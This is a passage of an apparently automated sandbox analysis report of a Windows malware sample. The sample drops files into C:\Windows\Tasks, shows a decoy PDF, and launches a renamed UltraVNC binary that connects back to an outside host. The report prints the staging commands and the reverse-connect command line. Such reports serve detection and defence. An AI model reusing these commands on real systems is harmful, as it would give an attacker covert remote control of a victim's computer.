                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401DC9
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Downloads\Lom.pdfJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03
                          Source: C:\Windows\Tasks\sync_browser.exeMutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000Jump to behavior
                          Source: mSRW5AfJpC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: sync_browser.exeString found in binary or memory: -stopservice
                          Source: sync_browser.exeString found in binary or memory: -install
                          Source: sync_browser.exeString found in binary or memory: -startservice
                          Source: sync_browser.exeString found in binary or memory: -stopservice
                          Source: sync_browser.exeString found in binary or memory: -install
                          Source: sync_browser.exeString found in binary or memory: -startservice
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeFile read: C:\Users\user\Desktop\mSRW5AfJpC.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\mSRW5AfJpC.exe "C:\Users\user\Desktop\mSRW5AfJpC.exe"
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 4735396734841324 4735396734841324.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,17186980694062401474,5929717192607302477,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 4735396734841324 4735396734841324.cmdJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,17186980694062401474,5929717192607302477,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: apphelp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: sspicli.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winsta.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wldp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeFile opened: C:\Windows\SYSTEM32\RICHED32.DLL
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: mSRW5AfJpC.exeStatic file information: File size 1648766 > 1048576
                          Source: Binary string: conhost.pdbUGP source: mSRW5AfJpC.exe, 00000000.00000003.2113874779.0000000002765000.00000004.00000020.00020000.00000000.sdmp, Ivn55G.PqhJnU.2.dr, conhost.exe.6.dr, Ivn55G.PqhJnU.0.dr
                          Source: Binary string: conhost.pdb source: mSRW5AfJpC.exe, 00000000.00000003.2113874779.0000000002765000.00000004.00000020.00020000.00000000.sdmp, Ivn55G.PqhJnU.2.dr, conhost.exe.6.dr, Ivn55G.PqhJnU.0.dr
                          Source: Ivn55G.PqhJnU.0.drStatic PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                          Source: mSRW5AfJpC.exeStatic PE information: real checksum: 0x2af97 should be: 0x19d63b
                          Source: Ivn55G.PqhJnU.0.drStatic PE information: section name: .didat
                          Source: Ivn55G.PqhJnU.2.drStatic PE information: section name: .didat
                          Source: conhost.exe.6.drStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00413660 push eax; ret 0_2_0041368E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400212EF push rbp; iretd 19_2_00007FF7400212F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001DC11 push rax; ret 19_2_00007FF74001DC13
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740021400 push rbp; iretd 19_2_00007FF740021401
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001DC01 push rcx; ret 19_2_00007FF74001DC02
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001DC21 push rsp; ret 19_2_00007FF74001DC23
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740038CF9 push 8B481074h; iretd 19_2_00007FF740038CFF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000FEF1 push rcx; ret 19_2_00007FF74000FEF2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400207F8 push rbp; iretd 19_2_00007FF7400207F9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400212EF push rbp; iretd 23_2_00007FF7400212F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001DC11 push rax; ret 23_2_00007FF74001DC13
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740021400 push rbp; iretd 23_2_00007FF740021401
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001DC01 push rcx; ret 23_2_00007FF74001DC02
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001DC21 push rsp; ret 23_2_00007FF74001DC23
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740038CF9 push 8B481074h; iretd 23_2_00007FF740038CFF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000FEF1 push rcx; ret 23_2_00007FF74000FEF2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400207F8 push rbp; iretd 23_2_00007FF7400207F9

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Fgyxfc.Qnwi4IJump to dropped file
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ivn55G.PqhJnUJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to dropped file
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4IJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Ivn55G.PqhJnUJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Fgyxfc.Qnwi4IJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Ivn55G.PqhJnUJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ivn55G.PqhJnUJump to dropped file
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ndymzn.PPYh2uJump to dropped file
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4IJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Fgyxfc.Qnwi4IJump to dropped file
